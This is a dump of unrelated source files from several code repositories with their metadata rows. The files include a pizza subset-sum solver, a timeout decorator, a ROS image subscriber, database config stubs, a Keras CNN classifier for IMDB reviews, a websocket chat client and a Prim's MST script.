    #     the_data = xml.read()
    #     r = requests.post(url_edge_lane, data=the_data)
    #     print(r.content)
    #
    # with open(edges_xml, 'r') as xml:
    #     # Give the object representing the XML file to requests.post.
    #     the_data = xml.read()
    #     r = requests.post(url_edges, data=the_data)
    #     print(r.content)

if __name__ == "__main__":
    Main()
"ge36voj@mytum.de"
] | ge36voj@mytum.de |
509e9d56682a9e7858514eff9ca4d13b748a8656 | 4ad9ae34e6d015ef865e93db71ac909531561ebe | /main.py | c65492feaa5b6e0797b04be2a760656191b624be | [] | no_license | chetanpujari5105/100DaysOfCodeInPython2021-Day-7 | 951e51cc420d5ea5dc2a6ee32e979e12ba466348 | 25055f6aa2030d27df0e721ced0a716404ccffa5 | refs/heads/main | 2023-02-13T21:45:10.933264 | 2021-01-10T18:18:43 | 2021-01-10T18:18:43 | 328,449,335 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | states_of_america = ["Delaware", "Pennsylvania", "New Jersey", "Georgia", "Connecticut", "Massachusetts", "Maryland", "South Carolina", "New Hampshire", "Virginia", "New York", "North Carolina", "Rhode Island", "Vermont", "Kentucky", "Tennessee", "Ohio", "Louisiana", "Indiana", "Mississippi", "Illinois", "Alabama", "Maine", "Missouri", "Arkansas", "Michigan", "Florida", "Texas", "Iowa", "Wisconsin", "California", "Minnesota", "Oregon", "Kansas", "West Virginia", "Nevada", "Nebraska", "Colorado", "North Dakota", "South Dakota", "Montana", "Washington", "Idaho", "Wyoming", "Utah", "Oklahoma", "New Mexico", "Arizona", "Alaska", "Hawaii"]
print(states_of_america)
print(states_of_america[1])
dirty_dozen = ["Strawberries", "Spinach", "Kale", "Nectarines", "Apples", "Grapes", "Peaches", "Cherries", "Pears", "Tomatoes", "Celery", "Potatoes"]
dirty_dozen.append("Banana")
print(dirty_dozen[-1])
| [
"noreply@github.com"
] | chetanpujari5105.noreply@github.com |
c1cc453fc746b6bc98f3d3c7890760918bc8317e | 5080f19c30738bff67e49eff7b91d3ba4315cd21 | /practice_pizza2020/test.py | ceb9be11a12ed3a579279bbd924093222874d8ef | [] | no_license | VincentZ-42/HashCode2020 | ad1edb71c20500f7ed0ab9b600e1fef926a839be | d30b3ae2549549dd133e134e3c3c77ecea0a5fb8 | refs/heads/master | 2021-01-07T12:59:54.862461 | 2020-02-20T22:57:09 | 2020-02-20T22:57:09 | 241,702,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # **************************************************************************** #
# #
# ::: :::::::: #
# test.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: vzhao <vzhao@student.42.fr> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/02/19 11:56:47 by vzhao #+# #+# #
# Updated: 2020/02/19 20:59:48 by vzhao ### ########.fr #
# #
# **************************************************************************** #
import os
def subset_sum(file_path, file, OG, numbers, target, partial =[]):
    """
    Function traverses through list of numbers to find the combination
    that matches the target value (Function runs recursively)
    Args:
        (str) file_path = path to the output file
        (file) file = the file object that we will write into
        (list) OG = original set of numbers
        (list) numbers = list of pizza types that is changed throughout recursion
        (int) target = the total number of pizzas we want
        (list) partial = list placeholder we use to hold the different types of pizzas
    Returns:
        Nothing...recursion stops once a combination has been written
    """
    # NOTE(review): mutable default `partial=[]` -- safe here because it is
    # only read and recombined (`partial + [n]`), never mutated in place, but
    # fragile.  The parameter `file` also shadows the Python 2 builtin.
    s = sum(partial)
    if s == target:
        # Exact combination found: write "<count>\n<space-separated indices>\n".
        file.write(str(len(partial)))
        file.write("\n")
        for j in range(len(partial)):
            # NOTE(review): OG.index() returns the FIRST index of a value, so
            # duplicate slice counts all map to the same pizza index -- confirm
            # this matches the intended output format.
            file.write(str(OG.index(partial[j])))
            if j < len(partial) - 1:
                file.write(" ")
        file.write("\n")
    if s >= target:
        return
    for i in range(len(numbers)):
        # Close and size-check the output file: once any solution has been
        # written, every pending recursion level bails out here.  Reopening
        # in "w" truncates, but at that point the file was still empty.
        file.close()
        if os.path.getsize(file_path) != 0:
            return
        file = open(file_path, "w")
        n = numbers[i]
        remaining = numbers[i+1:]
        subset_sum(file_path, file, OG, remaining, target, partial + [n])
a_in = open("a_example.in", "r") # This opens the text file and saves it into a variable
b_in = open("b_small.in", "r")
c_in = open("c_medium.in", "r")
d_in = open("d_quite_big.in", "r")
e_in = open("e_also_big.in", "r")
# -----------------------------Change this to get different outputs--------------------
# Reads the entire file and saves it into list
# Replace......
# a_in --> b_in (input from example b)
# a_out --> b_out (output of example b)
# "a_out" --> b_out (path name of newly created output file)
lines = c_in.readlines() # Change a_in to b_in
a_out = open("c_out", "w") # Change "a_out" to b_out
file_path = "c_out" # Change "a_out" to b_out
#---------------------------------------------------------------------------------------
slices, types = map(int, lines[0].split()) # Splits the first line into int variales
pizzas = map(int, lines[1].split()) # Splits the 2nd line into list of integers
# This checks if the file is empty or not
# Can also use os.stat(file_path).st_size == 0 as condition
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
while os.path.getsize(file_path) == 0:
a_out = open(file_path, "w")
subset_sum(file_path, a_out, pizzas, pizzas, slices)
slices -= 1
# a_out.close()
if os.path.getsize(file_path) == 0:
print "File is empty"
else:
print "File is not empty"
a_in.close()
b_in.close()
c_in.close()
d_in.close()
e_in.close()
| [
"vzhao@e1z1r4p3.42.us.org"
] | vzhao@e1z1r4p3.42.us.org |
7725728c4396eab46cc3164cd5889e7d901b4a5f | 5a760a0ff2a1655e3fbddd621a181378ea092fcc | /StarWebBuilder/timeout.py | 0586ada83fff4c9164333ee84c45b29f1a458022 | [
"MIT"
] | permissive | taschetto/sublimeSettings | 7f8292737b6f413718d7e076b9bd08e0ef8a297d | 64bcb568c240b851efc914b102e0c57e1553d8c5 | refs/heads/master | 2020-03-26T05:45:59.888806 | 2016-09-14T15:34:11 | 2016-09-14T15:35:07 | 26,015,128 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 550 | py | from functools import wraps
import errno
import os
import signal
class TimeoutError(Exception):
pass
def timeout(seconds=10, error_message=os.strerror(errno.ETIME)):
def decorator(func):
def _handle_timeout(signum, frame):
raise TimeoutError(error_message)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
return decorator | [
"gtaschetto@gmail.com"
] | gtaschetto@gmail.com |
7948a9e20dfc18adb728f35ea7d8d4a1387faf1a | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2408/60670/279400.py | 462432fde739ac9f0e437d3408deb95a44e663a4 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | def isPrime(x):
for i in range(2,int(x**0.5)+1):
if x%i!=0:
return False
return True
def factorial(n):
    """Return n! modulo 1_000_000_007.

    Fixes two defects in the original: the loop ran over range(1, n) and so
    computed (n-1)!, and the modulus was applied only once at the end,
    letting the intermediate product grow without bound.
    """
    t = 1
    for i in range(2, n + 1):
        # Reduce at every step to keep the product bounded.
        t = t * i % 1000000007
    return t
# Read n, count the primes in 1..n, then print
# factorial(numOfPrime) * factorial(n - numOfPrime) mod 1e9+7.
# NOTE(review): this appears to count permutations of 1..n that keep primes
# on prime-indexed positions — confirm against the original problem statement.
n = int(input())
numOfPrime = 0
for i in range(1, n + 1):
    if isPrime(i):
        numOfPrime += 1
print((factorial(numOfPrime) * factorial(n - numOfPrime)) % 1000000007)
"1069583789@qq.com"
] | 1069583789@qq.com |
d482fc54652390d38a71486ad7896776534966ae | 64ad122b299e457e2b37fddf9b059bdbf5858ca8 | /src/pose_estimation/scripts/image_processor.py | b2db59ae85d4feec36eb2651722ef72e9337183a | [] | no_license | faheinrich/pose_project | 8218d140f6020bc56bad1ef7ac3a40e53a6a3053 | 23e4283358940f662e7b12d1ad98d7ebc3c2efe6 | refs/heads/main | 2023-05-12T21:06:14.628014 | 2021-06-01T20:27:19 | 2021-06-01T20:27:19 | 365,174,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,045 | py | #!/usr/bin/env python3
# Description:
# - Subscribes to real-time streaming video from your built-in webcam.
#
# Author:
# - Addison Sears-Collins
# - https://automaticaddison.com
# Import the necessary libraries
import rospy # Python library for ROS
from sensor_msgs.msg import Image # Image is the message type
from cv_bridge import CvBridge # Package to convert between ROS and OpenCV Images
import cv2 # OpenCV library
# import sys
# import time
# import logging
# import numpy as np
# import matplotlib.pyplot as plt
# import cv2
# from tf_pose import common
# from tf_pose.estimator import TfPoseEstimator
# from tf_pose.networks import get_graph_path, model_wh
pub = rospy.Publisher('view_this', Image, queue_size=1)
# """
# https://learnopencv.com/deep-learning-based-human-pose-estimation-using-opencv-cpp-python/
# """
# # Specify the paths for the 2 files
# protoFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_deploy_linevec.prototxt"
# weightsFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_iter_160000.caffemodel"
# # Read the network into Memory
# net = cv2.dnn.readNetFromCaffe(protoFile, weightsFile)
# inWidth = 368
# inHeight = 368
# threshold = 0.6
def process_frame(frame):
    """Swap the channel order of an image array (RGB <-> BGR).

    A large block of disabled OpenCV-DNN pose-estimation code used to live
    here; it was dead (fully commented out) and has been removed. The only
    active behavior is reversing the last (channel) axis so that the
    republished frame is visibly different from the input.

    Args:
        frame: H x W x C image (numpy-like array supporting slicing).

    Returns:
        A channel-reversed view of ``frame``.
    """
    return frame[:, :, ::-1]
def callback(data):
    """ROS subscriber callback: convert an incoming Image message to an
    OpenCV array, process it, and republish it on the ``view_this`` topic."""
    # Used to convert between ROS and OpenCV images
    br = CvBridge()
    # Output debugging information to the terminal
    rospy.loginfo("receiving video frame")
    # Convert ROS Image message to OpenCV image
    received_frame = br.imgmsg_to_cv2(data)
    rospy.loginfo('processing received image')
    processed_frame = process_frame(received_frame)
    # Re-encode the processed array and publish; process_frame flips the
    # channel order, so subscribers see an RGB/BGR-swapped feed.
    pub.publish(br.cv2_to_imgmsg(processed_frame))
def receive_message():
    """Register this process as a ROS node, subscribe to the webcam topic,
    and block until the node is shut down."""
    # Tells rospy the name of the node.
    # Anonymous = True makes sure the node has a unique name. Random
    # numbers are added to the end of the name.
    rospy.init_node('image_processor', anonymous=True)
    # Node is subscribing to the video_frames topic
    rospy.Subscriber('webcam_frames', Image, callback)
    # spin() simply keeps python from exiting until this node is stopped
    rospy.spin()
    # Close down the video stream when done
    cv2.destroyAllWindows()
# Entry point: start the subscriber node when run as a script.
if __name__ == '__main__':
    receive_message()
| [
"faheinrich98@gmail.com"
] | faheinrich98@gmail.com |
955a3394f44e953f1a4c30c5c454af78e16f84da | a2477654a0fb85f9507389ff7a4b4a8bcc1641fa | /trydjango1-11/src/restaurants/migrations/0003_auto_20170926_1624.py | 5708b2f804f86a92b2d7213e1dbc4f79de3a24b5 | [] | no_license | ervinpepic/Django-11-Restaurant-app | 6ae1e2dec7571b0180ea991ca80b9b83d00cdb1b | a6bd976130c70621e6149ee64c61e1cdcec2acba | refs/heads/master | 2022-10-18T08:34:11.496044 | 2017-11-25T19:57:36 | 2017-11-25T19:57:36 | 111,400,182 | 0 | 1 | null | 2022-10-10T08:12:45 | 2017-11-20T11:13:00 | Python | UTF-8 | Python | false | false | 416 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-09-26 16:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: rename model Restaurant -> RestaurantLocation."""
    dependencies = [
        ('restaurants', '0002_restaurant_location'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='Restaurant',
            new_name='RestaurantLocation',
        ),
    ]
| [
"ervin.hack@gmail.com"
] | ervin.hack@gmail.com |
85dedc26a7d0b18671e3606cefba8011ec6f33a6 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_156/521.py | ca8aafaec283d6e9fa857be6020a6168166a825e | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | #!/usr/bin/python3
import sys
import math
# Google Code Jam-style solver (reads all cases from stdin).
# For each case: given diners' pancake counts, find the minimum number of
# minutes to finish, where each minute either everyone eats one pancake or
# one "special minute" splits a diner's stack. Explores splits with a BFS.
ncases = int(sys.stdin.readline().strip())
for t in range(1, ncases + 1):
    d = int(sys.stdin.readline().strip())
    values = sys.stdin.readline().strip().split()
    pancakes = [int(x) for x in values]
    pancakes.sort(reverse=True)
    # Baseline: no special minutes, time equals the tallest stack.
    best = pancakes[0]
    # Node format: List of diners with pancakes, number of special minutes
    initial_node = [pancakes, 0]
    queue = [initial_node]
    while queue:
        node = queue.pop(0)
        diners = node[0]
        special = node[1]
        top = diners[0]
        #if (top + special) >= best:
        #    continue
        if (top + special) < best:
            best = top + special
        # Splitting stacks of fewer than 4 pancakes can never help.
        if top < 4:
            continue
        # Let's introduce new special minutes. Note _all_ diners with
        # the max number of pancakes should be split (adding more special
        # minuts), as splitting just one of them is stupid
        for n in [2, 3, 4]:
            # Split `top` as evenly as possible into n stacks.
            splits = []
            remainder = top
            for i in range(0, n):
                split = math.floor(remainder / (n - i))
                remainder -= split
                splits.append(split)
            diners_after_special = list(diners)
            new_special = special
            # Replace every maximal stack by its n-way split.
            while diners_after_special[0] == top:
                diners_after_special.pop(0)
                diners_after_special += splits
                new_special += (n - 1)
            diners_after_special.sort(reverse=True)
            new_node = [diners_after_special, new_special]
            queue.append(new_node)
    print("Case #{0}: {1}".format(t, best))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
a4bc6700762042ba729d57d355527709795f6f6f | a19068d77efe49808ea54a2cdb1f64036248fbee | /experiments/CNN_BasicExpmnt.py | 61e841bdc706f2ff930a4c5325f94355a6b8fb27 | [] | no_license | sarneetk/NLP-Project | 6facb81a9307684f90c237192fcc824534dbfff5 | e5c483a763d5818365f8280292ac586638ba10ee | refs/heads/master | 2023-03-25T21:04:20.632517 | 2021-03-21T04:19:01 | 2021-03-21T04:19:01 | 344,712,064 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | # CNN for the IMDB problem
from tensorflow import keras
from keras.datasets import imdb
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras import backend as K
import matplotlib.pyplot as plt
plt.style.use('ggplot')
def plot_graph(history):
    """Render side-by-side accuracy and loss curves from a Keras History."""
    metrics = history.history
    train_acc = metrics['accuracy']
    epochs = range(1, len(train_acc) + 1)

    plt.figure(figsize=(12, 5))

    # Left panel: accuracy curves.
    plt.subplot(1, 2, 1)
    plt.plot(epochs, train_acc, 'b', label='Training acc')
    plt.plot(epochs, metrics['val_accuracy'], 'r', label='Validation acc')
    plt.title('Training and validation accuracy')
    plt.legend()

    # Right panel: loss curves.
    plt.subplot(1, 2, 2)
    plt.plot(epochs, metrics['loss'], 'b', label='Training loss')
    plt.plot(epochs, metrics['val_loss'], 'r', label='Validation loss')
    plt.title('Training and validation loss')
    plt.legend()

    plt.show()
def recall(y_true, y_pred):
    """Keras-backend "recall" metric.

    NOTE(review): the first line overwrites ``y_true`` with an all-ones
    tensor, so ``true_positives`` actually counts every rounded positive
    prediction and ``all_positives`` is the element count. This matches a
    widely copied snippet but is not standard recall — confirm it is
    intentional before relying on the reported numbers.
    """
    y_true = K.ones_like(y_true)
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    all_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
    # NOTE(review): comparing a backend tensor to 0 with != assumes eager
    # execution yields a scalar boolean; verify behavior under graph mode.
    if (true_positives != 0):
        recall0 = true_positives / (all_positives + K.epsilon())
    else:
        recall0 = 0.0
    return recall0
def precision(y_true, y_pred):
    """Keras-backend "precision" metric.

    NOTE(review): as in ``recall`` above, ``y_true`` is replaced by an
    all-ones tensor, so the numerator counts all rounded positive
    predictions rather than true positives — confirm this is intentional.
    """
    y_true = K.ones_like(y_true)
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
    # NOTE(review): tensor-vs-0 comparison assumes eager execution.
    if (true_positives != 0):
        precision0 = true_positives / (predicted_positives + K.epsilon())
    else:
        precision0 = 0.0
    return precision0
def f1_score(y_true, y_pred):
    """Harmonic mean of the precision and recall metrics defined above."""
    p = precision(y_true, y_pred)
    r = recall(y_true, y_pred)
    # epsilon() in the denominator guards against division by zero.
    return 2 * ((p * r) / (p + r + K.epsilon()))
if __name__ == '__main__':
    # load the dataset but only keep the top 5000 words, zero the rest
    top_words = 5000
    (X_train, y_train), (X_test, y_test) = imdb.load_data(num_words=top_words)
    # pad dataset to a maximum review length in words
    max_words = 500
    X_train = sequence.pad_sequences(X_train, maxlen=max_words)
    X_test = sequence.pad_sequences(X_test, maxlen=max_words)
    # Define CNN Model
    # first layer is the Embedded layer that uses 32 length vectors to represent each word.
    # The next layer is the one dimensional CNN layer .
    # Finally, because this is a classification problem we use a Dense output layer with a single neuron and
    # a sigmoid activation function to make 0 or 1 predictions for the two classes (good and bad) in the problem.
    embedding_vector_length = 32
    model = Sequential()
    model.add(Embedding(top_words, embedding_vector_length, input_length=max_words))
    model.add(Conv1D(32, 3, padding='same', activation='relu'))
    model.add(MaxPooling1D())
    model.add(Flatten())
    model.add(Dense(250, activation='relu'))
    model.add(Dense(1, activation='sigmoid'))
    # Track accuracy plus the custom F1/precision/recall metrics defined above.
    model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy', f1_score, precision, recall])
    model.summary()
    # Fit the model
    history = model.fit(X_train, y_train, validation_data=(X_test, y_test), epochs=3, batch_size=128, verbose=2)
    # Evaluation of the model with training data
    scores_train = model.evaluate(X_train, y_train, verbose=0)
    print("Training Data: ")
    # evaluate() returns [loss, accuracy, f1, precision, recall] in metric order.
    print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%% " % (scores_train[1]*100, scores_train[2]*100,
                                                                                       scores_train[3]*100, scores_train[4]*100))
    # Evaluation of the model with test data
    scores = model.evaluate(X_test, y_test, verbose=0)
    print("Test Data:")
    print("Accuracy: %.2f%%, F_1Score: %.2f%% , Precision: %.2f%%, Recall: %.2f%%" % (scores[1] * 100, scores[2] * 100,
                                                                                      scores[3] * 100, scores[4] * 100))
    # Plotting the graph
    plot_graph(history)
"noreply@github.com"
] | sarneetk.noreply@github.com |
36815ed5dbc21619f0e347fd9614d4889ea71b0d | bfb882c400956861fccd40bf1fb53cd6ddcba41e | /hagelslag/processing/__init__.py | 947f56449e95c6deffd11da0f81a50f94c71a716 | [
"MIT"
] | permissive | stsaten6/hagelslag | 3b1b07cf424997686b3320c538a188c790232bd7 | 6b7d0779a0b0ac4bd26fbe4931b406fad1ef9f9e | refs/heads/master | 2020-03-10T17:38:44.528943 | 2018-04-12T20:50:38 | 2018-04-12T20:50:38 | 129,504,847 | 2 | 0 | MIT | 2018-04-14T09:58:37 | 2018-04-14T09:58:37 | null | UTF-8 | Python | false | false | 524 | py | from .EnhancedWatershedSegmenter import EnhancedWatershed
from .EnsembleProducts import MachineLearningEnsembleProducts, EnsembleProducts, EnsembleConsensus
from .Hysteresis import Hysteresis
from .ObjectMatcher import ObjectMatcher, TrackMatcher
from .ObjectMatcher import mean_minimum_centroid_distance, centroid_distance, shifted_centroid_distance, nonoverlap, \
mean_min_time_distance, start_centroid_distance, start_time_distance, closest_distance
from .STObject import STObject, read_geojson
from .tracker import * | [
"djgagne@ou.edu"
] | djgagne@ou.edu |
fad84be7b3588e086eaa4f7158e430de704c6e85 | e35d35b22f11be27f439900e97248b7cab7aa85e | /client.py | beb1d0771d531e912584b4e968bc4f762d483a90 | [] | no_license | jkaria/chat-server | e1903912e047180077eb4b2bf9b7d2db1637fe33 | b92e0af97a1d4105d070b15951c91d7e406c39ab | refs/heads/master | 2020-03-20T23:08:22.980615 | 2018-06-22T04:14:42 | 2018-06-22T04:14:42 | 137,831,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import websocket
import _thread as thread
import sys
import re
import json
def on_message(ws, message):
    """Callback: echo a server-pushed chat message to stdout."""
    text = f"received > {message}"
    print(text)
def on_error(ws, error):
    """Callback: report a websocket error to stdout."""
    text = f"error > {error}"
    print(text)
def on_close(ws):
    """Callback: note that the server closed the connection."""
    notice = "Server connection closed"
    print(notice)
def on_open(ws):
    """Callback: once connected, read chat commands from stdin on a
    background thread and forward each as a JSON payload to the server."""
    def run(*args):
        # Expected input shape: "<to_user_id>: <message body>".
        # NOTE(review): "\s" in a non-raw string is a deprecated escape on
        # modern Python — consider r"(.+):\s(.+)".
        msg_format = re.compile("(.+):\s(.+)")
        while True:
            msg = input("<Enter message in format 'to_user_id: msg' (enter 'quit' to exit)>:\n")
            if msg == 'quit':
                break
            m = msg_format.match(msg)
            if not m:
                print("invalid message format")
                continue
            ws.send(json.dumps({'to_user_id': m[1], 'message': m[2]}))
            print(f"< sending: {m[2]}...")
        ws.close()
        print("Closed connection. Thread terminating...")
    #TODO: look into async input to get read of this thread
    thread.start_new_thread(run, ())
def connect_to_server(srv_port, username):
    """Open a websocket session to the local chat server and block forever."""
    websocket.enableTrace(True)
    url = f"ws://localhost:{srv_port}/client/{username}"
    app = websocket.WebSocketApp(
        url,
        on_message=on_message,
        on_error=on_error,
        on_close=on_close,
    )
    app.on_open = on_open
    app.run_forever()
# CLI entry: require exactly a server port and a username.
if len(sys.argv) != 3:
    print("Correct usage: server.py <server_port_number> <username>")
    exit(1)
connect_to_server(int(sys.argv[1]), str(sys.argv[2]))
| [
""
] | |
f21193e2e28fe1cc390d4ae97c312250c7ab7a79 | 947577e28fc58aa7505cc4da0de5ed454c7229ea | /DataStatistics/config/conf_database.py | c9f7c7a7d70b2da3783ef587323eb50427be3d7c | [] | no_license | chuxuan909/Tornado | 32064f110d49af8ff93b93ba9a8af1bb481452dc | 8946405de99dad8720c92248b9ebd06bdfe3c61f | refs/heads/master | 2020-09-05T14:08:20.462058 | 2019-11-08T09:52:40 | 2019-11-08T09:52:40 | 220,128,751 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,731 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from sqlalchemy import create_engine
# MySQL connection settings
database_config = {
    "passwd": "xxxxxxxxx",  # database password
    "user": "xxx",  # database user
    "url": "xxx.xxx.xxx.xxx",  # database host address
    "port": 3306,  # database connection port
    "dbs": {'userdb1': 'gHallSvrShardInfo_0', 'userdb2': 'gHallSvrSingleInfo_0', }  # names of the MySQL schemas to connect to
}
# MongoDB connection settings
database_mongo_config = {
    "passwd": "",  # database password
    "user": "",  # database user
    "url": "xxx.xxxxxx",  # database host address (test environment)
    "port": "27017",  # database connection port
    "db": "GHall",
    "collection": {"col1": "gameCoinDetail", "col2": "userPut", "col3": "userPutRank"}
}
# Redis connection settings
database_redis_config = {
    "passwd": "",  # redis password
    "user": "",  # redis user
    "url": "xxx.xxx.xxx.xxx",  # redis host address
    "port": "6379",  # redis connection port
    "db": 2,  # redis database number to use
}
def get_arg(info):
    """Look up *info* in the MySQL connection settings.

    :param info: configuration key
    :return: the configured value, or None when the key is absent
    """
    return database_config.get(info)
def get_mongo_arg(info):
    """Look up *info* in the MongoDB connection settings.

    :param info: configuration key
    :return: the configured value, or None when the key is absent
    """
    return database_mongo_config.get(info)
def get_redis_arg(info):
    """Look up *info* in the Redis connection settings.

    :param info: configuration key
    :return: the configured value, or None when the key is absent
    """
    return database_redis_config.get(info)
def test_db():
    '''
    Try to connect to every configured MySQL database and report the result.
    :return: None
    '''
    for value in get_arg('dbs').values():
        # Build one engine per configured schema.
        engine = create_engine('mysql+pymysql://%s:%s@%s:%d/%s' % (
            get_arg('user'), get_arg('passwd'), get_arg('url'), get_arg('port'), value), max_overflow=15,
            echo=False)
        try:
            dbs_name = engine.execute('show databases')
            if dbs_name:
                print("连接 >>%s:%d<< MySql数据库 [[%s]] 成功" % (get_arg('url'), get_arg('port'), value))
                dbs_name.close()
        except Exception as err:
            # Connection failure: print a hint plus the underlying error.
            print("数据库连接失败... 请检查连接配置和数据库服务器配置")
            print(err)
if __name__ == "__main__":
print('数据库地址 : %s ' % get_arg('url'))
print('数据库连接端口 %d' % get_arg('port'))
for index in get_arg('dbs').keys():
print('连接的数据库 %s 名称为 : %s' % (index, get_arg('dbs')[index]))
raw=input("是否测试数据库连接? [Y/N]\t")
if raw == "Y" or raw == "y":
test_db()
else:
pass
| [
"305958872@qq.com"
] | 305958872@qq.com |
2354d06939d6c72e5399a441a3e3c362fe7451e0 | 65e2f1f1daaaf175b09d0863f6ed77c77129fed6 | /c/personal/algo_007/programming_assignments/algo_002/1/prim/prim_bkp.py | a4a4efd5fb5b32000cb176f21d8e90f7d077059b | [] | no_license | ausanyal/code | 86b010613eb5b9dc0ada717e0db8e21f4ede8961 | a359f9cfb650d57ce88c39dc0e15dce19a5324bd | refs/heads/master | 2021-01-01T15:39:34.985446 | 2018-05-07T01:47:02 | 2018-05-07T01:47:02 | 97,669,433 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,539 | py | #!/usr/bin/python
import sys
import collections
from decimal import Decimal

# --- Input parsing (Python 2 script) ---
# Reads an edge list from "input". First line: "<num_vertices> <num_edges>".
# Each following line: "u v e" (edge u->v with cost e).
f = open('input', 'r')
lines = f.readlines()

nv = 0
ne = 0
# d maps vertex -> {'ud': {cost: [neighbors]}, 'od': same, cost-sorted}.
d = {}
for line in lines:
    if ne == 0:
        # NOTE(review): nv and ne stay *strings* here; later code compares
        # ints against nv, which only orders consistently on Python 2.
        nv, ne = line.split(' ')
    else:
        u, v, e = map(int, line.split(' '))
        if u not in d.keys():
            d[u] = {}
            d[u]['ud'] = {}
        if e not in d[u]['ud'].keys():
            d[u]['ud'][e] = []
        d[u]['ud'][e].append(v)
        # Keep a cost-ordered view so the cheapest edge is keys()[0].
        d[u]['od'] = collections.OrderedDict(sorted(d[u]['ud'].items()))
def find_smallest_cut(pd):
    """Return (u, v, cost) for the cheapest edge crossing the cut from the
    explored set *pd* into an unexplored vertex, or (0, 0, 0) on failure.

    Mutates the module-level adjacency dict ``d``: edges that point back
    into ``pd`` are deleted before the minimum is taken.
    NOTE(review): Python 2 only — uses print statements and relies on
    ``dict.keys()`` returning an indexable list.
    """
    le_key = Decimal('Infinity')
    ct = 0
    # we need to explore a new edge per iter
    # v cannot point to an existing vertex already explored
    for u in pd.keys():
        if u == 500:
            continue
        if u not in d.keys():
            #print "u: ", 6, "not in keys"
            continue
        # Prune edges whose endpoint is already explored.
        for e in d[u]['od'].keys():
            for v in d[u]['od'][e]:
                if v in pd.keys():
                    #print "v", v, "for u", u, "in pd.keys", pd.keys()
                    del d[u]['od'][e]
                    ct = ct + 1
    le_u = None
    # Second pass: pick the frontier vertex with the cheapest remaining edge.
    for u in pd.keys():
        if u == 500:
            continue
        if u not in d.keys():
            #print "u: ", 6, "not in keys"
            continue
        if len(d[u]['od'].keys()) > 0:
            #print "1. u: ", u, "pd.keys: ", pd.keys(), "d[u]['od'].keys()[0] : ", d[u]['od'].keys()[0]
            if d[u]['od'].keys()[0] < le_key:
                le_u = u
                le_key = d[le_u]['od'].keys()[0]
    if le_u is not None:
        v = d[le_u]['od'][le_key][0]
        #print "3. ", le_key, "u: ", le_u, "v: ", v
        return le_u, v, le_key
    else:
        print "(((((((((((((((((((((((((( ERROR ))))))))))))))))))))))))))", ct
        return 0, 0, 0
# --- Prim-style MST growth (Python 2) ---
# Start from vertex 1 and repeatedly absorb the cheapest crossing edge,
# accumulating the total weight in w.
i = 1
count = 0
w = 0
pd = {}
# add i to pd
#print "************* Adding ", i, "to pd ", pd.keys()
pd[i] = []
# NOTE(review): nv is still the string read from the header, so
# "count < nv" depends on Python 2's int-vs-str ordering.
while (count < nv):
    u, v, le_key = find_smallest_cut(pd)
    pd[u] = [ v, le_key ]
    if v not in pd.keys() and (v != 0):
        # add v to pd
        pd[v] = []
    w = w + le_key
    print "************* Adding ", u, "-", v, "to pd ", pd.keys(), "e: ", le_key, "w: ", w
    #del d[u]['od'][le_key]
    count = count + 1
    #print "7: ", u, v, le_key, " pd.keys: ", pd.keys(), "count: ", count, "w: ", w, "len: ", len(pd.keys())
    if len(pd.keys()) == int(nv):
        print "Done"
        break
'''
def find_smallest_cut(pd):
le_key = Decimal('Infinity')
for u in pd.keys():
print "1. u: ", u, "pd.keys: ", pd.keys()
#print "2. ", d[u]
if d[u]['od'].keys()[0] < le_key:
le_u = u
le_key = d[le_u]['od'].keys()[0]
# for this le get first v from the list of (u, v1) or (u, v2) ...
v = d[le_u]['od'][le_key][0]
# we need to explore a new edge per iter
# v cannot point to an existing vertex already explored
if v in pd.keys():
print "2: v: ", v, "is in pd.keys"
del d[le_u]['od'][le_key]
print "3: remaining in le_u: ", le_u, "keys: ", d[le_u]['od']
le_key = Decimal('Infinity')
if d[u]['od'].keys()[0] is not None:
